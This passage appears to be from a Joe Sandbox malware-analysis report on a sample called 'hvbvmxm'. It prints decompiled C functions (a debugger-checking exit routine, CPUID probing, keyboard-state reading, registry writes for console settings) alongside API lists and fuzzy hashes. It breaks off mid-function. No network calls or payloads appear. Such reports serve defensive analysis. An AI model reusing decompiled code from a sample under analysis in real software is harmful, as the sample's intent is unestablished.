                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: c9f595f4c12b3c713a793296114e74ee72371fc8dcb2f522ef5c7feb5bf74d21
                                                  • Instruction ID: dac4e714ee62853d945dadcb4c286b01b5b61ff83486e76bb43d3c3e46b120bf
                                                  • Opcode Fuzzy Hash: c9f595f4c12b3c713a793296114e74ee72371fc8dcb2f522ef5c7feb5bf74d21
                                                  • Instruction Fuzzy Hash: 4531E675901218ABCB21DF65DC88BCDBBB4BF08310F5081EAE40CA7291EB749F858F49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040ED78(int _a4) {
                                                  				void* _t14;
                                                  
                                                  				if(E0041141B(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                  					TerminateProcess(GetCurrentProcess(), _a4);
                                                  				}
                                                  				E0040EDFD(_t14, _a4);
                                                  				ExitProcess(_a4);
                                                  			}





                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0040ED77,?,?,?,?,?,0040DCC5), ref: 0040ED9A
                                                  • TerminateProcess.KERNEL32(00000000,?,0040ED77,?,?,?,?,?,0040DCC5), ref: 0040EDA1
                                                  • ExitProcess.KERNEL32 ref: 0040EDB3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 5e847e64d47f93f094269ba6c8cc11d0e0f9a2d23a74b6a0331aa0892e6addf5
                                                  • Instruction ID: 52e974c79d60c63c95dc49b22d37d2646a15dda942993e9eb9fef874fb8fadf3
                                                  • Opcode Fuzzy Hash: 5e847e64d47f93f094269ba6c8cc11d0e0f9a2d23a74b6a0331aa0892e6addf5
                                                  • Instruction Fuzzy Hash: E8E0B632000158AFCB516F56DD09A993B6AFF80755F04883AF90596271CF39ED92DA98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E0040ACAB(intOrPtr __edx) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed char _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				signed int _v48;
                                                  				signed int _t59;
                                                  				signed int _t62;
                                                  				signed int _t63;
                                                  				intOrPtr _t65;
                                                  				signed int _t66;
                                                  				signed int _t68;
                                                  				intOrPtr _t73;
                                                  				intOrPtr* _t75;
                                                  				intOrPtr* _t77;
                                                  				intOrPtr _t84;
                                                  				intOrPtr* _t86;
                                                  				signed int _t91;
                                                  				signed int _t94;
                                                  
                                                  				_t84 = __edx;
                                                  				 *0x421024 =  *0x421024 & 0x00000000;
                                                  				 *0x41f630 =  *0x41f630 | 1;
                                                  				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                  					L20:
                                                  					return 0;
                                                  				}
                                                  				_v24 = _v24 & 0x00000000;
                                                  				 *0x41f630 =  *0x41f630 | 0x00000002;
                                                  				 *0x421024 = 1;
                                                  				_t86 =  &_v48;
                                                  				_push(1);
                                                  				asm("cpuid");
                                                  				_pop(_t73);
                                                  				 *_t86 = 0;
                                                  				 *((intOrPtr*)(_t86 + 4)) = 1;
                                                  				 *((intOrPtr*)(_t86 + 8)) = 0;
                                                  				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
                                                  				_v16 = _v48;
                                                  				_v8 = _v36 ^ 0x49656e69;
                                                  				_v12 = _v40 ^ 0x6c65746e;
                                                  				_push(1);
                                                  				asm("cpuid");
                                                  				_t75 =  &_v48;
                                                  				 *_t75 = 1;
                                                  				 *((intOrPtr*)(_t75 + 4)) = _t73;
                                                  				 *((intOrPtr*)(_t75 + 8)) = 0;
                                                  				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
                                                  				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
                                                  					L9:
                                                  					_t91 =  *0x421028; // 0x2
                                                  					L10:
                                                  					_v32 = _v36;
                                                  					_t59 = _v40;
                                                  					_v8 = _t59;
                                                  					_v28 = _t59;
                                                  					if(_v16 >= 7) {
                                                  						_t65 = 7;
                                                  						_push(_t75);
                                                  						asm("cpuid");
                                                  						_t77 =  &_v48;
                                                  						 *_t77 = _t65;
                                                  						 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                  						 *((intOrPtr*)(_t77 + 8)) = 0;
                                                  						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
                                                  						_t66 = _v44;
                                                  						_v24 = _t66;
                                                  						_t59 = _v8;
                                                  						if((_t66 & 0x00000200) != 0) {
                                                  							 *0x421028 = _t91 | 0x00000002;
                                                  						}
                                                  					}
                                                  					if((_t59 & 0x00100000) != 0) {
                                                  						 *0x41f630 =  *0x41f630 | 0x00000004;
                                                  						 *0x421024 = 2;
                                                  						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
                                                  							asm("xgetbv");
                                                  							_v20 = _t59;
                                                  							_v16 = _t84;
                                                  							if((_v20 & 0x00000006) == 6 && 0 == 0) {
                                                  								_t62 =  *0x41f630; // 0x2f
                                                  								_t63 = _t62 | 0x00000008;
                                                  								 *0x421024 = 3;
                                                  								 *0x41f630 = _t63;
                                                  								if((_v24 & 0x00000020) != 0) {
                                                  									 *0x421024 = 5;
                                                  									 *0x41f630 = _t63 | 0x00000020;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					goto L20;
                                                  				}
                                                  				_t68 = _v48 & 0x0fff3ff0;
                                                  				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
                                                  					_t94 =  *0x421028; // 0x2
                                                  					_t91 = _t94 | 0x00000001;
                                                  					 *0x421028 = _t91;
                                                  					goto L10;
                                                  				} else {
                                                  					goto L9;
                                                  				}
                                                  			}




























                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040ACC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-3916222277
                                                  • Opcode ID: 0f31f1ac051cff7357700d541dd8a3fb934e405a9f7f0deb270f5a5deba497d9
                                                  • Instruction ID: f566798ac463ad169bc779d5e3272e55cb8cb489a98a76cff77b7a923ed78ee1
                                                  • Opcode Fuzzy Hash: 0f31f1ac051cff7357700d541dd8a3fb934e405a9f7f0deb270f5a5deba497d9
                                                  • Instruction Fuzzy Hash: 8C517DB1D003089BDB24CF69D98569EBBF5FB08314F14817BD808F76A0D3389956CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404020(void* __ecx, BYTE* _a4) {
                                                  				signed int _v8;
                                                  
                                                  				_v8 = 0;
                                                  				GetKeyboardState(_a4);
                                                  				if(( *(_a4 + (1 << 4)) & 0x80) != 0) {
                                                  					_v8 = _v8 | 0x00000010;
                                                  				}
                                                  				if((_a4[0xa2] & 0x80) != 0) {
                                                  					_v8 = _v8 | 0x00000008;
                                                  				}
                                                  				if((_a4[0xa3] & 0x80) != 0) {
                                                  					_v8 = _v8 | 0x00000004;
                                                  				}
                                                  				if((_a4[0xa4] & 0x80) != 0) {
                                                  					_v8 = _v8 | 0x00000002;
                                                  				}
                                                  				if((_a4[0xa5] & 0x80) != 0) {
                                                  					_v8 = _v8 | 0x00000001;
                                                  				}
                                                  				if((_a4[0x14] & 1) != 0) {
                                                  					_v8 = _v8 | 0x00000080;
                                                  				}
                                                  				if((_a4[0x90] & 1) != 0) {
                                                  					_v8 = _v8 | 0x00000020;
                                                  				}
                                                  				if((_a4[0x91] & 1) != 0) {
                                                  					_v8 = _v8 | 0x00000040;
                                                  				}
                                                  				return _v8;
                                                  			}





                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 0040402F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState
                                                  • String ID:
                                                  • API String ID: 1724228437-0
                                                  • Opcode ID: 88207723aa0c8e0794195c1b7853b7a0e3712123715cc588a99eaaac9dd39dcb
                                                  • Instruction ID: 262ec3806ea75a0b8bae02f3621129f9f9e8aaa30daa8b7f176cb94f82c166f4
                                                  • Opcode Fuzzy Hash: 88207723aa0c8e0794195c1b7853b7a0e3712123715cc588a99eaaac9dd39dcb
                                                  • Instruction Fuzzy Hash: 80316D70A041489BEB08CF98C5617A9BBB2FB85300F14C0BAE585AF7D5C63A9F40DB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0041273A() {
                                                  				signed int _t3;
                                                  
                                                  				_t3 = GetProcessHeap();
                                                  				 *0x421ad0 = _t3;
                                                  				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                  			}




                                                  0x0041273a
                                                  0x00412742
                                                  0x0041274a

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 6423bf49c813b52c1af739fede76114f0272a1df1963f5fd1ba8df99edaf2905
                                                  • Instruction ID: 3d5ce7a95b10b5d90c454b6e44bd31d7f76a4a760882723bc95d97f459a7c44d
                                                  • Opcode Fuzzy Hash: 6423bf49c813b52c1af739fede76114f0272a1df1963f5fd1ba8df99edaf2905
                                                  • Instruction Fuzzy Hash: 43A01130202200CB83008F32AA0A2083AAABA882C0B02803CA002C0230EB2080008A0A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99f7f8a727c11264525f8cb6de1cb7337fd0f498ccee2e52288f3cdfd2a68309
                                                  • Instruction ID: 15f3aae0866ba897d942bcca4d20c4b909254cb01b08fae255ed31e29ae0b573
                                                  • Opcode Fuzzy Hash: 99f7f8a727c11264525f8cb6de1cb7337fd0f498ccee2e52288f3cdfd2a68309
                                                  • Instruction Fuzzy Hash: 0221A132710218AFD750FF69C8849AEB7E9EFA83A4B148466F846DB311D234DE04CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13604c29325f2004163b2aa178d0763ca0500bc422fb4823b0b3684db1ed90d5
                                                  • Instruction ID: dda985d708535783bcd86315be7b39c80be376a473bcc684958ebf439b3c26ba
                                                  • Opcode Fuzzy Hash: 13604c29325f2004163b2aa178d0763ca0500bc422fb4823b0b3684db1ed90d5
                                                  • Instruction Fuzzy Hash: DEE04F36360649AFCB40EBA8CD81D55B3F8EB08368B144290F916D73E1E674ED00DB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc0bda6141fd36cf9d678f032adb249b3112c4c6bd4a6d514cefce2705d38c4d
                                                  • Instruction ID: 007607f7609d368ce51b911081cae6225aedab0ada0bd24c01b61a1cd1cd32dd
                                                  • Opcode Fuzzy Hash: dc0bda6141fd36cf9d678f032adb249b3112c4c6bd4a6d514cefce2705d38c4d
                                                  • Instruction Fuzzy Hash: 9DE04F322209149BC7A2BA59C844D96F7E9EF887F0B0544A5E949A7631C631FC04D790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0041141B(void* __ecx) {
                                                  				char _v8;
                                                  				intOrPtr _t7;
                                                  				char _t13;
                                                  
                                                  				_t13 = 0;
                                                  				_v8 = 0;
                                                  				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                  				_t16 =  *((intOrPtr*)(_t7 + 8));
                                                  				if( *((intOrPtr*)(_t7 + 8)) < 0) {
                                                  					L2:
                                                  					_t13 = 1;
                                                  				} else {
                                                  					E004123F7(_t16,  &_v8);
                                                  					if(_v8 != 1) {
                                                  						goto L2;
                                                  					}
                                                  				}
                                                  				return _t13;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9153446cb6cd44745a40b7f6cb4543bddff00f9c5f0bacd49f36d3320f98c124
                                                  • Instruction ID: ca300cbffba5b4123e4a1514258fb5bd75c6ab346c830727b02bd9d104cc973d
                                                  • Opcode Fuzzy Hash: 9153446cb6cd44745a40b7f6cb4543bddff00f9c5f0bacd49f36d3320f98c124
                                                  • Instruction Fuzzy Hash: 4FE04632911268EBCB15DB99C90498AB2ACEB49B18B15009ABA11D3211C278DE40C7D5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E00405D50(void* _a4, int _a8, intOrPtr _a12) {
                                                  				char _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				int _v20;
                                                  				short _v84;
                                                  				intOrPtr _v88;
                                                  				intOrPtr _v92;
                                                  				intOrPtr _v96;
                                                  				intOrPtr _v104;
                                                  				intOrPtr _v108;
                                                  				intOrPtr _v112;
                                                  				intOrPtr _v116;
                                                  				intOrPtr _v120;
                                                  				intOrPtr _v124;
                                                  				intOrPtr _v128;
                                                  				intOrPtr _v132;
                                                  				intOrPtr _v136;
                                                  				intOrPtr _v140;
                                                  				intOrPtr _v144;
                                                  				intOrPtr _v148;
                                                  				intOrPtr _v152;
                                                  				intOrPtr _v156;
                                                  				intOrPtr _v160;
                                                  				char _v224;
                                                  				short _v252;
                                                  				long _t189;
                                                  				int _t200;
                                                  				int _t201;
                                                  				signed int _t234;
                                                  				void* _t354;
                                                  				void* _t355;
                                                  
                                                  				if(_a12 == 0) {
                                                  					_t189 = E00404B80(0,  &_v224);
                                                  				}
                                                  				_v12 = 0;
                                                  				while(1) {
                                                  					0x400000(_a8);
                                                  					if(_v12 >= _t189) {
                                                  						break;
                                                  					}
                                                  					if(_a12 != 0) {
                                                  						L7:
                                                  						wsprintfW( &_v252, L"ColorTable%02d", _v12);
                                                  						_t355 = _t355 + 0xc;
                                                  						_v8 =  *(_a8 + _v12 * 4);
                                                  						_t189 = RegSetValueExW(_a4,  &_v252, 0, 4,  &_v8, 4);
                                                  					} else {
                                                  						_t189 =  *(_a8 + _v12 * 4);
                                                  						if(_t189 !=  *((intOrPtr*)(_t354 + _v12 * 4 - 0xdc))) {
                                                  							goto L7;
                                                  						}
                                                  					}
                                                  					_v12 = _v12 + 1;
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x48) != _v152) {
                                                  					_v8 =  *(_a8 + 0x48);
                                                  					RegSetValueExW(_a4, L"CursorSize", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x4c) != _v148) {
                                                  					_v8 =  *(_a8 + 0x4c);
                                                  					RegSetValueExW(_a4, L"CursorVisible", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x80) != _v96) {
                                                  					_v8 =  *(_a8 + 0x80);
                                                  					RegSetValueExW(_a4, L"EditionMode", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 || lstrcmpW(_a8 + 0x8c,  &_v84) != 0) {
                                                  					RegSetValueExW(_a4, L"FaceName", 0, 1, _a8 + 0x8c, lstrlenW(_a8 + 0x8c) + _t196 + 2);
                                                  				}
                                                  				if(_a12 != 0) {
                                                  					L23:
                                                  					_v8 =  *(_a8 + 0x84);
                                                  					_t200 = RegSetValueExW(_a4, L"FontPitchFamily", 0, 4,  &_v8, 4);
                                                  				} else {
                                                  					_t200 = _a8;
                                                  					if( *((intOrPtr*)(_t200 + 0x84)) != _v92) {
                                                  						goto L23;
                                                  					}
                                                  				}
                                                  				if(_a12 != 0) {
                                                  					L27:
                                                  					__imp__GetDpiForSystem();
                                                  					_t201 = MulDiv( *(_a8 + 0x40), 0x60, _t200);
                                                  					_v16 = _t201;
                                                  					__imp__GetDpiForSystem();
                                                  					_v20 = MulDiv( *(_a8 + 0x44), 0x60, _t201);
                                                  					_v8 = _v16 & 0xffff | (_v20 & 0xffff) << 0x00000010;
                                                  					RegSetValueExW(_a4, L"FontSize", 0, 4,  &_v8, 4);
                                                  				} else {
                                                  					_t200 = _a8;
                                                  					if( *((intOrPtr*)(_t200 + 0x44)) != _v156) {
                                                  						goto L27;
                                                  					} else {
                                                  						_t200 =  *(_a8 + 0x40);
                                                  						if(_t200 != _v160) {
                                                  							goto L27;
                                                  						}
                                                  					}
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x88) != _v88) {
                                                  					_v8 =  *(_a8 + 0x88);
                                                  					RegSetValueExW(_a4, L"FontWeight", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x58) != _v136) {
                                                  					_v8 =  *(_a8 + 0x58);
                                                  					RegSetValueExW(_a4, L"HistoryBufferSize", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x5c) != _v132) {
                                                  					_v8 =  *(_a8 + 0x5c);
                                                  					RegSetValueExW(_a4, L"HistoryNoDup", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x60) != _v128) {
                                                  					_v8 =  *(_a8 + 0x60);
                                                  					RegSetValueExW(_a4, L"InsertMode", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x64) != _v124) {
                                                  					_v8 =  *(_a8 + 0x64);
                                                  					RegSetValueExW(_a4, L"MenuMask", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x54) != _v140) {
                                                  					_v8 =  *(_a8 + 0x54);
                                                  					RegSetValueExW(_a4, L"PopupColors", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x68) != _v120) {
                                                  					_v8 =  *(_a8 + 0x68);
                                                  					RegSetValueExW(_a4, L"QuickEdit", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x6c) != _v116 ||  *(_a8 + 0x70) != _v112) {
                                                  					_v8 =  *(_a8 + 0x6c) & 0xffff | ( *(_a8 + 0x70) & 0xffff) << 0x00000010;
                                                  					RegSetValueExW(_a4, L"ScreenBufferSize", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x50) != _v144) {
                                                  					_v8 =  *(_a8 + 0x50);
                                                  					RegSetValueExW(_a4, L"ScreenColors", 0, 4,  &_v8, 4);
                                                  				}
                                                  				if(_a12 != 0 ||  *(_a8 + 0x74) != _v108) {
                                                  					L59:
                                                  					_v8 =  *(_a8 + 0x74) & 0xffff | ( *(_a8 + 0x78) & 0xffff) << 0x00000010;
                                                  					return RegSetValueExW(_a4, L"WindowSize", 0, 4,  &_v8, 4);
                                                  				}
                                                  				_t234 =  *(_a8 + 0x78);
                                                  				if(_t234 != _v104) {
                                                  					goto L59;
                                                  				}
                                                  				return _t234;
                                                  			}

                                                  APIs
                                                  • wsprintfW.USER32 ref: 00405DB8
                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,00000001,00000004), ref: 00405DE2
                                                  • RegSetValueExW.ADVAPI32(00000000,CursorSize,00000000,00000004,00000001,00000004), ref: 00405E1A
                                                  • RegSetValueExW.ADVAPI32(00000000,CursorVisible,00000000,00000004,00000001,00000004), ref: 00405E50
                                                  • RegSetValueExW.ADVAPI32(00000000,EditionMode,00000000,00000004,00000001,00000004), ref: 00405E89
                                                    • Part of subcall function 00404B80: GetDpiForSystem.USER32 ref: 00404BCC
                                                    • Part of subcall function 00404B80: MulDiv.KERNEL32(00000010,00000000), ref: 00404BD5
                                                    • Part of subcall function 00404B80: GetDpiForSystem.USER32 ref: 00404BE3
                                                    • Part of subcall function 00404B80: MulDiv.KERNEL32(00000008,00000000), ref: 00404BEC
                                                  • lstrcmpW.KERNEL32(-0000008C,?), ref: 00405EA3
                                                  • lstrlenW.KERNEL32(-0000008C), ref: 00405EB7
                                                  • RegSetValueExW.ADVAPI32(00000000,FaceName,00000000,00000001,-0000008C,?), ref: 00405ED9
                                                  • RegSetValueExW.ADVAPI32(00000000,FontPitchFamily,00000000,00000004,00000001,00000004), ref: 00405F12
                                                  • GetDpiForSystem.USER32 ref: 00405F3A
                                                  • MulDiv.KERNEL32(?,00000060,00000000), ref: 00405F4A
                                                  • GetDpiForSystem.USER32 ref: 00405F53
                                                  • MulDiv.KERNEL32(?,00000060,00000000), ref: 00405F63
                                                  • RegSetValueExW.ADVAPI32(00000000,FontSize,00000000,00000004,00000001,00000004), ref: 00405F9F
                                                  • RegSetValueExW.ADVAPI32(00000000,FontWeight,00000000,00000004,00000001,00000004), ref: 00405FD8
                                                  • RegSetValueExW.ADVAPI32(00000000,HistoryBufferSize,00000000,00000004,00000001,00000004), ref: 0040600E
                                                  • RegSetValueExW.ADVAPI32(00000000,HistoryNoDup,00000000,00000004,00000001,00000004), ref: 00406041
                                                  • RegSetValueExW.ADVAPI32(00000000,InsertMode,00000000,00000004,00000001,00000004), ref: 00406074
                                                  • RegSetValueExW.ADVAPI32(00000000,MenuMask,00000000,00000004,00000001,00000004), ref: 004060A7
                                                  • RegSetValueExW.ADVAPI32(00000000,PopupColors,00000000,00000004,00000001,00000004), ref: 004060DD
                                                  • RegSetValueExW.ADVAPI32(00000000,QuickEdit,00000000,00000004,00000001,00000004), ref: 00406110
                                                  • RegSetValueExW.ADVAPI32(00000000,ScreenBufferSize,00000000,00000004,00000001,00000004), ref: 0040616B
                                                  • RegSetValueExW.ADVAPI32(00000000,ScreenColors,00000000,00000004,00000001,00000004), ref: 004061A1
                                                  • RegSetValueExW.ADVAPI32(00000000,WindowSize,00000000,00000004,00000001,00000004), ref: 004061FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Value$System$lstrcmplstrlenwsprintf
                                                  • String ID: ColorTable%02d$CursorSize$CursorVisible$EditionMode$FaceName$FontPitchFamily$FontSize$FontWeight$HistoryBufferSize$HistoryNoDup$InsertMode$MenuMask$PopupColors$QuickEdit$ScreenBufferSize$ScreenColors$WindowSize
                                                  • API String ID: 4202061470-2593552325
                                                  • Opcode ID: c377fce4735b1483155afc4da19cac0cb70c38cc7ed8436257ffd1a2833aa6b5
                                                  • Instruction ID: 441eaab03b607b7a808d6496199c41919d270a7cf16c843be99aa31c8b4d6b29
                                                  • Opcode Fuzzy Hash: c377fce4735b1483155afc4da19cac0cb70c38cc7ed8436257ffd1a2833aa6b5
                                                  • Instruction Fuzzy Hash: 1902E574640208EFEB14DF50C885FAE7776FB44714F60C16AFA15AB281C778AE85CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E00403CD0(int _a4, int _a8, int _a12, long _a16) {
                                                  				int _v8;
                                                  				struct HINSTANCE__* _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				long _v24;
                                                  				int _v28;
                                                  				void* _v32;
                                                  				struct tagPAINTSTRUCT _v96;
                                                  				short _v608;
                                                  
                                                  				_v8 = _a8;
                                                  				_v8 = _v8 - 1;
